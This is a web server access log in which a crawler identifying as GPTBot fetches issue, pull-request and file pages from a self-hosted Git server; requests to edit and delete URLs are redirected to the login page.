[Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=rendered" [Client 74.7.227.38] [Length 11176] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:18:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11142] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:18:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:18:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" -[17/Feb/2026:18:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10139] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:18:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10136] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" -[17/Feb/2026:18:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/base_library.zip" -[17/Feb/2026:18:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:18:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 11107] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot" -[17/Feb/2026:18:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 11112] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor" -[17/Feb/2026:18:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:57:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:18:57:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:18:57:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:57:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 9819] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11116] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 896] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 898] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/base_library.zip" -[17/Feb/2026:18:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/base_library.zip" -[17/Feb/2026:18:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:18:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10159] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?state=all&type=all" [Client 74.7.227.38] [Length 10089] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:18:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 11210] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:18:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:18:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:18:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 11207] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:18:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 11208] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:18:57:49 